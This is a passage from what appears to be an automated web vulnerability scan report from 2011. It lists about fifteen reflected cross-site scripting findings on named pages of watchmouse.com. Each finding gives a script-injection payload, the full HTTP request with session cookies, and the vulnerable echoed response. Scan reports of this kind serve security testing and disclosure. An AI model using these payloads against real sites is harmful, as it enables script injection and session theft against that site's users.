Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en11bc5"><script>alert(1)</script>0030cd96bc9/checkit.php" method="post">
...[SNIP]...

1.88. http://www.watchmouse.com/en/checkit.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/checkit.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230e8"><script>alert(1)</script>4a288135e9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/checkit.php230e8"><script>alert(1)</script>4a288135e9d HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-67efcefa0450e20e44c2f55c3c40a0ec"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/checkit.php230e8"><script>alert(1)</script>4a288135e9d" method="post">
...[SNIP]...

1.89. http://www.watchmouse.com/en/checkit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/checkit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a2a"><script>alert(1)</script>a6122662567 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/checkit.php?72a2a"><script>alert(1)</script>a6122662567=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:07:11 GMT
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: nkey=deleted; expires=Tue, 09-Feb-2010 12:07:10 GMT; path=/; domain=.watchmouse.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/checkit.php?72a2a"><script>alert(1)</script>a6122662567=1" method="post">
...[SNIP]...

1.90. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e73e"><script>alert(1)</script>35ba5ba3a10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en4e73e"><script>alert(1)</script>35ba5ba3a10/compare_plans.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0bd773010b5077b12c865fd29ccd88d8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en4e73e"><script>alert(1)</script>35ba5ba3a10/compare_plans.php" method="post">
...[SNIP]...

1.91. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e340"><script>alert(1)</script>9221b0de922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/compare_plans.php6e340"><script>alert(1)</script>9221b0de922 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b91f20af3fe8132dbe91642df473a9d9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/compare_plans.php6e340"><script>alert(1)</script>9221b0de922" method="post">
...[SNIP]...

1.92. http://www.watchmouse.com/en/compare_plans.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf72"><script>alert(1)</script>669a34a531f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/compare_plans.php?9bf72"><script>alert(1)</script>669a34a531f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-dc30a3cc8f1a54fa30620834f64e7144"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/compare_plans.php?9bf72"><script>alert(1)</script>669a34a531f=1" method="post">
...[SNIP]...

1.93. http://www.watchmouse.com/en/compare_plans.php [vpackid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The value of the vpackid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99432"><script>alert(1)</script>ae1d7b19b4f was submitted in the vpackid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/compare_plans.php?vpackid=3599432"><script>alert(1)</script>ae1d7b19b4f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bce360f73e4c99d9dd54b17508033d43"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/compare_plans.php?vpackid=3599432"><script>alert(1)</script>ae1d7b19b4f" method="post">
...[SNIP]...

1.94. http://www.watchmouse.com/en/contact.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517df"><script>alert(1)</script>9aa81fe30a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en517df"><script>alert(1)</script>9aa81fe30a4/contact.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-948f2a7f2cb3d3f5350da831684188af"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en517df"><script>alert(1)</script>9aa81fe30a4/contact.php" method="post">
...[SNIP]...

1.95. http://www.watchmouse.com/en/contact.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dece"><script>alert(1)</script>e746a2f3c3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact.php3dece"><script>alert(1)</script>e746a2f3c3e HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-25bd6165334a4fb8c20d0d187d750dc7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/contact.php3dece"><script>alert(1)</script>e746a2f3c3e" method="post">
...[SNIP]...

1.96. http://www.watchmouse.com/en/contact.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a050"><script>alert(1)</script>2b2742388bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact.php?6a050"><script>alert(1)</script>2b2742388bf=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a9c0a450dd6dd958560f3669bbe01d89"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/contact.php?6a050"><script>alert(1)</script>2b2742388bf=1" method="post">
...[SNIP]...

1.97. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/current_partners.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f15"><script>alert(1)</script>5ad96335c0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en42f15"><script>alert(1)</script>5ad96335c0e/current_partners.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2144e3f2f97e0de65099ddb3a56c8736"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en42f15"><script>alert(1)</script>5ad96335c0e/current_partners.php" method="post">
...[SNIP]...

1.98. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/current_partners.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6bc2"><script>alert(1)</script>81608cc8e78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/current_partners.phpb6bc2"><script>alert(1)</script>81608cc8e78 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-22c4668430472ca477ec8d7df0ad1c9c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/current_partners.phpb6bc2"><script>alert(1)</script>81608cc8e78" method="post">
...[SNIP]...

1.99. http://www.watchmouse.com/en/current_partners.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/current_partners.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 695a3"><script>alert(1)</script>4b0a60696ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/current_partners.php?695a3"><script>alert(1)</script>4b0a60696ee=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5b3a837ac4107dd50eab95adaa88f027"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/current_partners.php?695a3"><script>alert(1)</script>4b0a60696ee=1" method="post">
...[SNIP]...

1.100. http://www.watchmouse.com/en/customers.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/customers.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ea8"><script>alert(1)</script>c346d5181b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en57ea8"><script>alert(1)</script>c346d5181b0/customers.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f08f3cbfe2000a2d1f33ad024175cf57"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en57ea8"><script>alert(1)</script>c346d5181b0/customers.php" method="post">
...[SNIP]...

1.101. http://www.watchmouse.com/en/customers.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/customers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ddd0"><script>alert(1)</script>ed307c79623 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/customers.php7ddd0"><script>alert(1)</script>ed307c79623 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-11bfdfda5b05c993c30ea6dff564b394"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/customers.php7ddd0"><script>alert(1)</script>ed307c79623" method="post">
...[SNIP]...

1.102. http://www.watchmouse.com/en/customers.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/customers.php

Issue detail

